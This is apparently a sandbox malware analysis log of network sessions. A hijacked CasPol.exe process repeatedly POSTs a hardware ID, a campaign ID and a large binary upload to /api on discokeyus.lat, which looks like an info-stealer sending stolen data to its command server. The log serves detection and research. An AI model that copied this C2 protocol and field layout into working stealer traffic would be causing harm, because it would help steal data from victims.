2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 62 41 67 48 62 48 63 2b 35 55 4e 43 76 62 4e 59 4a 43 4f 30 4d 4b 57 44 4b 42 57 72 58 61 4b 43 6a 46 51 67 47 76 61 58 6c 64 73 6b 44 59 55 70 4d 50 6b 75 67 30 4b 76 74 6f 6e 69 4d 72 53 77 39 42 59 36 6c 36 34 66 49 6b 51 65 42 6e 4f 59 38 45 4d 44 69 47 36 4e 41 69 35 30 65 36 58 42 67 72 34 78 47 79 62 68 74 4c 4b 6d 77 2b 6d 46 2b 51 34 67 78 6f 78 52 6f 42 43 79 51 30 59 4c 37 38 74 47 61 32 56 39 74 55 5a 52 66 6e 4a 4b 63 6e 4b 31 73 53 62 42 4b 70 62 71 6e 79 4a 41 6d 4d 52 78 32 76 4c 46 52 30 6d 74 69 45 45 76 74 37 6d 6e 52 49 4a 38 4e 64 73 67 35 69 56 67 64 41 48 73 68 66 79 4f 4c 49 46 59 51 37 44 4c 76 4d 49 44 44 71 36 4b 77 50 32 79 71 65 43 51 41 4c 79 68 54 48 52 6a 4e 72 47 6b 77 2b 72 58 71 5a 31 67 51 74 30 48 38 5a 6f 79 42 51 50 Data Ascii: bAgHbHc+5UNCvbNYJCO0MKWDKBWrXaKCjFQgGvaXldskDYUpMPkug0KvtoniMrSw9BY6l64fIkQeBnOY8EMDiG6NAi50e6XBgr4xGybhtLKmw+mF+Q4gxoxRoBCyQ0YL78tGa2V9tUZRfnJKcnK1sSbBKpbqnyJAmMRx2vLFR0mtiEEvt7mnRIJ8Ndsg5iVgdAHshfyOLIFYQ7DLvMIDDq6KwP2yqeCQALyhTHRjNrGkw+rXqZ1gQt0H8ZoyBQP
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 44 34 7a 4b 6d 63 44 45 57 6d 68 57 71 57 69 64 54 46 6d 51 79 6c 55 4b 35 71 6a 67 56 6a 48 38 46 6e 7a 78 49 50 49 62 77 73 44 72 2f 59 35 5a 59 48 41 76 48 41 4b 64 2f 4b 30 74 66 51 57 4f 70 32 70 33 4f 49 57 53 74 65 33 79 4c 62 58 67 67 67 38 58 35 50 74 74 2f 73 6b 51 30 47 38 63 5a 37 6b 49 7a 48 7a 35 30 4b 75 46 32 68 66 59 6b 50 66 42 33 47 61 73 6b 53 48 53 57 78 4a 51 54 32 6d 36 6d 63 47 45 57 6d 68 55 71 47 6e 4e 2f 49 6e 42 61 68 56 71 6c 75 69 52 49 78 55 49 42 39 78 51 39 50 64 4b 63 32 47 4c 48 4b 70 34 4a 41 41 76 4b 46 4d 64 47 4d 33 4d 6d 58 42 71 52 46 72 33 36 4c 44 58 67 58 78 47 54 42 48 67 73 6f 74 69 4d 4d 75 74 37 75 6d 41 38 42 39 38 74 67 6e 73 71 62 6a 35 63 59 36 67 2f 71 57 5a 38 42 66 52 4f 41 63 34 77 48 54 79 75 39 5a Data Ascii: D4zKmcDEWmhWqWidTFmQylUK5qjgVjH8FnzxIPIbwsDr/Y5ZYHAvHAKd/K0tfQWOp2p3OIWSte3yLbXggg8X5Ptt/skQ0G8cZ7kIzHz50KuF2hfYkPfB3GaskSHSWxJQT2m6mcGEWmhUqGnN/InBahVqluiRIxUIB9xQ9PdKc2GLHKp4JAAvKFMdGM3MmXBqRFr36LDXgXxGTBHgsotiMMut7umA8B98tgnsqbj5cY6g/qWZ8BfROAc4wHTyu9Z
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 78 32 79 41 4f 36 4d 42 75 68 38 6a 67 7a 4a 34 4f 72 55 48 71 5a 37 74 4d 4d 52 48 61 4c 4a 6f 6e 46 6d 79 32 4b 6b 2f 75 6c 66 79 63 41 41 4c 6b 30 32 36 64 6d 39 37 43 6e 43 4b 6c 55 4c 78 37 69 77 46 67 46 34 78 6e 7a 31 35 42 62 4c 59 2b 54 2b 36 56 78 70 77 57 42 74 48 47 65 4a 6a 4b 6d 34 2b 58 46 75 6f 50 36 6b 62 45 45 48 49 4f 77 32 50 54 49 45 39 30 71 42 68 50 76 63 50 75 69 77 4d 54 39 63 68 6c 67 4c 53 56 6c 38 52 53 2b 41 58 34 4b 70 74 43 62 69 47 4f 4c 4d 4e 65 56 78 57 6f 5a 68 6e 32 6a 62 76 56 51 42 65 2b 6e 53 6e 57 69 63 66 64 6c 67 4f 38 56 4f 31 47 75 69 56 6e 46 4d 64 38 78 51 6b 41 62 50 39 6d 41 50 61 4e 30 4e 73 4a 41 75 58 55 66 35 79 61 30 6f 2b 76 54 75 70 50 36 69 44 45 4e 33 49 51 7a 6d 76 55 44 30 49 4c 70 79 77 49 70 74 Data Ascii: x2yAO6MBuh8jgzJ4OrUHqZ7tMMRHaLJonFmy2Kk/ulfycAALk026dm97CnCKlULx7iwFgF4xnz15BbLY+T+6VxpwWBtHGeJjKm4+XFuoP6kbEEHIOw2PTIE90qBhPvcPuiwMT9chlgLSVl8RS+AX4KptCbiGOLMNeVxWoZhn2jbvVQBe+nSnWicfdlgO8VO1GuiVnFMd8xQkAbP9mAPaN0NsJAuXUf5ya0o+vTupP6iDEN3IQzmvUD0ILpywIpt
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 43 72 4c 4c 59 70 47 4e 78 64 6d 4c 54 4b 4a 55 73 47 4b 36 50 46 6f 53 78 6d 76 59 47 51 6b 4b 6b 57 5a 42 39 74 71 70 77 7a 6c 46 74 6f 56 57 33 38 72 4e 6a 38 68 41 6e 31 53 6b 64 6f 4d 55 59 46 50 6f 54 2f 67 6b 54 51 43 32 4d 30 32 43 30 76 6d 4b 43 77 6a 79 68 53 66 52 6a 4a 57 58 77 45 37 71 55 37 73 34 33 46 49 6a 52 5a 55 2f 6c 55 35 64 4d 2f 38 2f 54 36 43 56 73 63 6c 4f 52 65 79 46 4d 64 48 4e 31 74 32 43 42 71 6c 42 71 54 2b 36 50 46 59 51 78 32 33 55 44 68 67 6a 6a 78 67 61 74 64 76 6e 6e 42 59 55 76 6f 73 70 6e 73 71 4e 39 74 42 49 36 6d 6a 6b 4f 4a 78 43 4b 56 37 31 62 38 77 51 43 44 71 67 61 79 69 34 30 75 69 4e 45 42 4c 78 68 53 66 52 6a 4a 57 58 77 6b 37 71 55 37 73 34 33 46 49 6a 52 5a 55 2f 6c 55 35 64 4d 2f 38 2f 54 36 43 56 73 63 6c Data Ascii: CrLLYpGNxdmLTKJUsGK6PFoSxmvYGQkKkWZB9tqpwzlFtoVW38rNj8hAn1SkdoMUYFPoT/gkTQC2M02C0vmKCwjyhSfRjJWXwE7qU7s43FIjRZU/lU5dM/8/T6CVsclOReyFMdHN1t2CBqlBqT+6PFYQx23UDhgjjxgatdvnnBYUvospnsqN9tBI6mjkOJxCKV71b8wQCDqgayi40uiNEBLxhSfRjJWXwk7qU7s43FIjRZU/lU5dM/8/T6CVscl
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 69 75 78 6a 63 50 4d 30 45 37 71 57 2b 6f 67 78 41 4e 37 44 73 31 6a 78 56 49 49 4e 72 5a 6d 51 66 62 62 71 63 4e 41 42 50 54 56 5a 4a 36 4e 6d 63 6d 65 44 75 70 49 35 47 48 45 46 44 46 47 6b 79 4b 43 44 45 39 30 38 57 45 4d 70 4d 66 76 6d 42 59 47 75 66 74 58 76 4a 6a 53 33 35 4e 43 6d 31 71 75 62 70 45 42 59 52 6e 2b 55 75 38 4d 43 44 79 79 5a 44 36 67 31 75 6d 56 42 30 57 77 68 58 48 52 30 70 58 69 67 67 65 36 56 4f 6f 32 78 41 34 78 52 6f 42 68 30 42 6b 66 4c 2f 30 68 46 62 47 56 39 74 55 5a 52 65 69 46 4d 63 4c 45 6c 64 33 51 57 4f 6f 51 70 48 57 46 41 58 38 64 30 6e 37 45 48 52 6b 76 39 68 67 78 6d 38 66 75 69 77 4e 48 7a 38 68 74 68 35 2f 57 33 35 63 2b 6c 48 71 34 66 35 51 42 4d 7a 4c 48 59 63 34 67 4d 52 75 67 49 52 2f 30 38 2b 71 4e 41 30 57 77 Data Ascii: iuxjcPM0E7qW+ogxAN7Ds1jxVIINrZmQfbbqcNABPTVZJ6NmcmeDupI5GHEFDFGkyKCDE908WEMpMfvmBYGuftXvJjS35NCm1qubpEBYRn+Uu8MCDyyZD6g1umVB0WwhXHR0pXigge6VOo2xA4xRoBh0BkfL/0hFbGV9tUZReiFMcLEld3QWOoQpHWFAX8d0n7EHRkv9hgxm8fuiwNHz8hth5/W35c+lHq4f5QBMzLHYc4gMRugIR/08+qNA0Ww

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49731	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:27 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JJCHZ09245IHFZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12812 Host: discokeyus.lat
2024-12-21 12:17:27 UTC	12812	OUT	Data Raw: 2d 2d 4a 4a 43 48 5a 30 39 32 34 35 49 48 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 30 41 30 41 31 34 38 30 37 32 33 41 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 4a 43 48 5a 30 39 32 34 35 49 48 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 4a 43 48 5a 30 39 32 34 35 49 48 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 0d 0a 2d 2d 4a 4a 43 48 5a 30 39 Data Ascii: --JJCHZ09245IHFZContent-Disposition: form-data; name="hwid"A40A0A1480723A5EAC8923850305D13E--JJCHZ09245IHFZContent-Disposition: form-data; name="pid"2--JJCHZ09245IHFZContent-Disposition: form-data; name="lid"OPCN2M--Sergei--JJCHZ09
2024-12-21 12:17:28 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3t1rjq96h5trj7qthgav7huc6h; expires=Wed, 16 Apr 2025 06:04:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fj5pic1zm6EQ%2FytKEK9JtRYKmhnHRjzk1x96wv8iIa3yB5EO9ZwOojcs1ijysYITkwtyiP9dWfF%2FEh45LeZQ63EvB1WYxLUiSlAjK9y6miYGYWQliUt6ijQM4D%2FPndbTTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf22cb0c433a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1749&rtt_var=662&sent=14&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13746&delivery_rate=1644144&cwnd=242&unsent_bytes=0&cid=70f618d8464cb752&ts=1094&x=0"
2024-12-21 12:17:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:17:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49741	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:29 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BTXLCIL19R05PAIV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15066 Host: discokeyus.lat
2024-12-21 12:17:29 UTC	15066	OUT	Data Raw: 2d 2d 42 54 58 4c 43 49 4c 31 39 52 30 35 50 41 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 30 41 30 41 31 34 38 30 37 32 33 41 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 54 58 4c 43 49 4c 31 39 52 30 35 50 41 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 54 58 4c 43 49 4c 31 39 52 30 35 50 41 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 0d 0a 2d 2d 42 Data Ascii: --BTXLCIL19R05PAIVContent-Disposition: form-data; name="hwid"A40A0A1480723A5EAC8923850305D13E--BTXLCIL19R05PAIVContent-Disposition: form-data; name="pid"2--BTXLCIL19R05PAIVContent-Disposition: form-data; name="lid"OPCN2M--Sergei--B
2024-12-21 12:17:30 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=movblf886s1gjgcoq1b1st02uj; expires=Wed, 16 Apr 2025 06:04:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8IHMq5MhnERyWfDCeoT%2FrLOexglgQalKHwTGxGrkcODWfP7zXnOIENcPm5wxpgb%2BfN2CEpVExDrJe8lXo5p%2FsAsvcHOD9eakqaaV1yxnKctEFjKb6p7o90VAiYc1XDBBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf2fce934245-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1623&rtt_var=617&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=16002&delivery_rate=1762220&cwnd=187&unsent_bytes=0&cid=edb9c140f41203c9&ts=871&x=0"
2024-12-21 12:17:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:17:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49750	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:31 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JBUIQ349L User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20514 Host: discokeyus.lat
2024-12-21 12:17:31 UTC	15331	OUT	Data Raw: 2d 2d 4a 42 55 49 51 33 34 39 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 30 41 30 41 31 34 38 30 37 32 33 41 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 42 55 49 51 33 34 39 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 42 55 49 51 33 34 39 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 0d 0a 2d 2d 4a 42 55 49 51 33 34 39 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --JBUIQ349LContent-Disposition: form-data; name="hwid"A40A0A1480723A5EAC8923850305D13E--JBUIQ349LContent-Disposition: form-data; name="pid"3--JBUIQ349LContent-Disposition: form-data; name="lid"OPCN2M--Sergei--JBUIQ349LContent-Dis
2024-12-21 12:17:31 UTC	5183	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 Data Ascii: un 4F([:7s~X`nO`i`
2024-12-21 12:17:32 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vj2epbaq5nvea28sn9sc3te6uf; expires=Wed, 16 Apr 2025 06:04:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TR7nJTaAOT0sESGKxZPd%2FGCedO6u0ckzbWPqah0WyI53GFT5J6V2NYCH2RYe0HxFGiw4bsrVesI9qy4TjNXL4dXVIq3FSz9rlm%2B3MGny22%2FVYN40PsEaqzZ5%2BuS82D7dMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf3d4aca8c09-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1817&rtt_var=683&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21465&delivery_rate=1601755&cwnd=240&unsent_bytes=0&cid=8520bc3fbef2eac3&ts=938&x=0"
2024-12-21 12:17:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:17:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49756	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:33 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QI8UC3UJNMKBV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1258 Host: discokeyus.lat
2024-12-21 12:17:33 UTC	1258	OUT	Data Raw: 2d 2d 51 49 38 55 43 33 55 4a 4e 4d 4b 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 30 41 30 41 31 34 38 30 37 32 33 41 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 49 38 55 43 33 55 4a 4e 4d 4b 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 49 38 55 43 33 55 4a 4e 4d 4b 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 0d 0a 2d 2d 51 49 38 55 43 33 55 4a 4e 4d Data Ascii: --QI8UC3UJNMKBVContent-Disposition: form-data; name="hwid"A40A0A1480723A5EAC8923850305D13E--QI8UC3UJNMKBVContent-Disposition: form-data; name="pid"1--QI8UC3UJNMKBVContent-Disposition: form-data; name="lid"OPCN2M--Sergei--QI8UC3UJNM
2024-12-21 12:17:34 UTC	1122	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pholun9o017ohctj8d2bvmsh47; expires=Wed, 16 Apr 2025 06:04:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RHzr2f6h1VDAdA2E9SecA1fvGTw7SmbZx9Jh6pelqYqYEyxAazcv%2FRwJuuIK8yFDHn2BKXQaglnf4UsauckscETgt41ichQJEkLLjgiyUvqjO0DDdfmSUIenwmaCxYDww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf4bdb274262-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1701&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2168&delivery_rate=1657207&cwnd=190&unsent_bytes=0&cid=437536b5b07ecca5&ts=680&x=0"
2024-12-21 12:17:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:17:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49762	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:36 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WLEMZG0B User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 422841 Host: discokeyus.lat
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: 2d 2d 57 4c 45 4d 5a 47 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 30 41 30 41 31 34 38 30 37 32 33 41 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 4c 45 4d 5a 47 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 4c 45 4d 5a 47 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 0d 0a 2d 2d 57 4c 45 4d 5a 47 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 Data Ascii: --WLEMZG0BContent-Disposition: form-data; name="hwid"A40A0A1480723A5EAC8923850305D13E--WLEMZG0BContent-Disposition: form-data; name="pid"1--WLEMZG0BContent-Disposition: form-data; name="lid"OPCN2M--Sergei--WLEMZG0BContent-Disposi
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: 1a 5c 0c 01 61 2a a8 6d 7f b7 ce 30 c7 9b 32 de 7c a1 12 5a 08 65 dc 44 57 e3 ae c7 98 0b 66 ab 5f aa 7b 1f 6d 1b 98 c1 a3 c9 e6 02 00 38 55 e5 e6 95 3c 51 45 b7 20 18 ca 0d 40 0f af b8 99 35 d2 90 05 6b 99 b6 b5 e7 99 8b e7 f8 2f 10 99 89 3d c6 8f 24 6d 94 d1 b6 ec fb fa 57 ef af 1b 29 61 ed d1 52 e6 b7 cd 83 1b 8f 99 25 5a a8 99 c7 4f b4 fe d8 b8 46 ba 76 ed ea 3b 60 7a 0e e4 63 fa c7 a8 51 64 5a f6 db 8a 80 8c 4d 59 89 a3 14 10 94 0b 67 98 27 69 ac cc dd bc 74 7a c4 c8 ce 77 8d e1 b2 68 34 06 be 8e be 13 8a 31 e5 dd 77 fc 72 01 18 32 35 6b b1 e4 68 2b 33 91 23 a6 1d fd 33 af 4b 6f 5f d1 32 69 ed 32 cf c9 84 c8 d7 88 35 66 3f f6 58 6b 32 f5 99 bb 66 d8 92 7b ec e8 ed e0 df d7 38 e6 bb dc b0 ae c5 fc 12 af 4d b0 ef d3 a0 c9 c3 76 cd 53 7d 71 d6 0c 53 22 Data Ascii: \a*m02\|ZeDWf_{m8U<QE @5k/=$mW)aR%ZOFv;`zcQdZMYg'itzwh41wr25kh+3#3Ko_2i25f?Xk2f{8MvS}qS"
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: 26 54 60 e1 93 93 0e 5e 18 2a 29 d4 26 16 ce 71 64 d0 90 19 ae 25 dd 9a 79 aa 1f b4 0f 0a 4c a6 a6 12 03 3a a9 b4 83 8d 15 1e 7a 67 b4 f9 db 14 89 90 01 d2 49 ad bd 95 06 7a 52 6d 60 7d 58 cd 66 dc b4 e6 79 20 55 69 b2 ff 5c a9 3d ed f9 bf f4 fe 23 ca bf 01 87 24 35 a7 7f bc 0a b9 48 4d ef ee 18 7c 36 7c fb ef 6c f4 a0 fc 41 01 e9 99 f2 3b 26 2e b7 44 07 a0 21 0e de 41 39 cb 09 df 14 5d ba 56 37 9d 94 a5 38 48 53 59 68 e7 22 f5 02 63 6d 37 6a 5c 3b 78 1e 55 de af 2d 5b d4 08 f9 3c fe c3 b2 fb 04 52 6c 4d 27 91 ea 41 5d 7f db dd 4e fe 1b f8 61 3d 8e d3 7d 79 69 2f e3 d7 e8 bd ee 9a bb 5a 70 43 b9 7d dd 36 e0 49 45 30 5b cd b9 a9 f8 